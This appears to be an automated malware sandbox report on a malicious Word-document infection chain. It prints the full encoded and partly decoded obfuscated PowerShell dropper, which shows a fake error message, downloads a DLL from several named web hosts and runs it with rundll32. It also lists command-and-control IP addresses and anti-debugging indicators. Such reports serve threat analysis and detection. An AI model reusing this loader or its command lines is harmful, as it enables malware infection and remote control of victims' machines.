Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000008.00000002.2142890318.000000000086D000.00000004.00000020.sdmp	Binary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\SysWOW64\rundll32.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_100031D0 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWind

7_2_100031D0

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10015D3F EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

7_2_10015D3F

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_10015D3F

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B6AB2 mov eax, dword ptr fs:[00000030h]	7_2_001B6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D76B2 mov eax, dword ptr fs:[00000030h]	9_2_001D76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F6AB2 mov eax, dword ptr fs:[00000030h]	10_2_001F6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00306AB2 mov eax, dword ptr fs:[00000030h]	11_2_00306AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B76B2 mov eax, dword ptr fs:[00000030h]	12_2_004B76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C6AB2 mov eax, dword ptr fs:[00000030h]	13_2_001C6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D76B2 mov eax, dword ptr fs:[00000030h]	14_2_001D76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_001A6AB2 mov eax, dword ptr fs:[00000030h]	15_2_001A6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_001E76B2 mov eax, dword ptr fs:[00000030h]	17_2_001E76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_00206AB2 mov eax, dword ptr fs:[00000030h]	18_2_00206AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_002076B2 mov eax, dword ptr fs:[00000030h]	20_2_002076B2

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10005930 SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

7_2_10005930

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000BCEA SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_1000BCEA

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 202.187.222.40 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 184.66.18.83 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 167.71.148.58 187

Encrypted powershell cmdline option found

Source: unknown	Process created: Base64 decoded $ioxKy2 = [tYPE]("{2}{0}{3}{1}"-f'sTEm.iO.diRecT','y','Sy','Or') ; sEt-IteM vaRiabLe:16VJ ([tYPe]("{6}{7}{3}{5}{0}{2}{4}{1}" -F'V','r','IcEPoiN','NeT.S','TmaNaGE','eR','sYS','tem.') );$Kt3sbog=('B'+('m'+'v'+'kk9r'));$Mj5npw_=$Z9ls4z6 + [char](64) + $G35w524;$Yd085rx=('Ux'+('ee'+'_')+'wl'); ( gEt-itEM ('vaRI'+'AblE'+':'+'IoXKY2') ).VAlue::"C`RE`AT`e`dIREctOrY"($HOME + ((('IE'+'c')+'O'+('_'+'wgq')+'v'+('7'+'IEcC031')+('6emIE'+'c')) -crEplAcE ('IE'+'c'),[cHAR]92));$Ml29469=('R'+('6j'+'kuve')); ( VARiAbLe 16vj -vALUEon )::"sEC`Urityp`RoTo`coL" = ('Tl'+('s1'+'2'));$Nimh_ux=('He'+'z'+('fu'+'29'));$Mem0uwr = ('Ly'+('et'+'a6')+'ud');$Fj_inxi=(('Vv'+'3')+('jeg'+'8'));$Gyzf4g8=(('Q5'+'7qw')+'k'+'z');$C0w7ro6=$HOME+(('{0}O_wgqv'+'7'+'{0'+'}'+'C'+'0316em{0}') -f [ChAr]92)+$Mem0uwr+(('.d'+'l')+'l');$Gb3lyk8=(('Mx'+'1g')+('g'+'om'));$Rp56zra=NEW`-Ob`JeCt NeT.WEbCLiEnt;$Cj5kwnm=(((('http:qq)'+'(s2'+')(qq'+')'))+'('+(('s2'+')(zen'+'i'))+('thc'+'ampu'+'s.c')+(('o'+'mqq)(s2'+')'+'(lq'+'q)'))+(('(s'))+'2'+((')'+'(yQ'+'qq)('))+(('s'+'2)'))+('(@htt'+'p'+':q'+'q'+')(s2)')+(('(q'))+(('q'+')(s2)'))+(('(h'+'b'))+('privile'+'g')+('e'+'d.')+(('co'+'mqq)(s2)'+'(cg'+'i-bin'+'q'))+(('q)('+'s2)'))+(('(kcg'+'gFqq'))+((')'+'(s2)'))+('(@htt'+'p'+':'+'qq)')+'('+(('s2)('+'q'))+(('q)('+'s2)('+'l'+'oc'))+'al'+'af'+('fo'+'rdab'+'l'+'er')+('oof'+'e')+'r.'+'co'+(('mq'+'q)(s2'+')'))+'('+('r'+'al')+'ph'+'s-'+'r'+('e'+'ce')+(('ipt-f2uh'+'fqq'+')('))+'s2'+((')'+'(q'))+'T'+('T'+'5DC')+'qq'+')'+(('(s'+'2'
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $ioxKy2 = [tYPE]("{2}{0}{3}{1}"-f'sTEm.iO.diRecT','y','Sy','Or') ; sEt-IteM vaRiabLe:16VJ ([tYPe]("{6}{7}{3}{5}{0}{2}{4}{1}" -F'V','r','IcEPoiN','NeT.S','TmaNaGE','eR','sYS','tem.') );$Kt3sbog=('B'+('m'+'v'+'kk9r'));$Mj5npw_=$Z9ls4z6 + [char](64) + $G35w524;$Yd085rx=('Ux'+('ee'+'_')+'wl'); ( gEt-itEM ('vaRI'+'AblE'+':'+'IoXKY2') ).VAlue::"C`RE`AT`e`dIREctOrY"($HOME + ((('IE'+'c')+'O'+('_'+'wgq')+'v'+('7'+'IEcC031')+('6emIE'+'c')) -crEplAcE ('IE'+'c'),[cHAR]92));$Ml29469=('R'+('6j'+'kuve')); ( VARiAbLe 16vj -vALUEon )::"sEC`Urityp`RoTo`coL" = ('Tl'+('s1'+'2'));$Nimh_ux=('He'+'z'+('fu'+'29'));$Mem0uwr = ('Ly'+('et'+'a6')+'ud');$Fj_inxi=(('Vv'+'3')+('jeg'+'8'));$Gyzf4g8=(('Q5'+'7qw')+'k'+'z');$C0w7ro6=$HOME+(('{0}O_wgqv'+'7'+'{0'+'}'+'C'+'0316em{0}') -f [ChAr]92)+$Mem0uwr+(('.d'+'l')+'l');$Gb3lyk8=(('Mx'+'1g')+('g'+'om'));$Rp56zra=NEW`-Ob`JeCt NeT.WEbCLiEnt;$Cj5kwnm=(((('http:qq)'+'(s2'+')(qq'+')'))+'('+(('s2'+')(zen'+'i'))+('thc'+'ampu'+'s.c')+(('o'+'mqq)(s2'+')'+'(lq'+'q)'))+(('(s'))+'2'+((')'+'(yQ'+'qq)('))+(('s'+'2)'))+('(@htt'+'p'+':q'+'q'+')(s2)')+(('(q'))+(('q'+')(s2)'))+(('(h'+'b'))+('privile'+'g')+('e'+'d.')+(('co'+'mqq)(s2)'+'(cg'+'i-bin'+'q'))+(('q)('+'s2)'))+(('(kcg'+'gFqq'))+((')'+'(s2)'))+('(@htt'+'p'+':'+'qq)')+'('+(('s2)('+'q'))+(('q)('+'s2)('+'l'+'oc'))+'al'+'af'+('fo'+'rdab'+'l'+'er')+('oof'+'e')+'r.'+'co'+(('mq'+'q)(s2'+')'))+'('+('r'+'al')+'ph'+'s-'+'r'+('e'+'ce')+(('ipt-f2uh'+'fqq'+')('))+'s2'+((')'+'(q'))+'T'+('T'+'5DC')+'qq'+')'+(('(s'+'2'			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 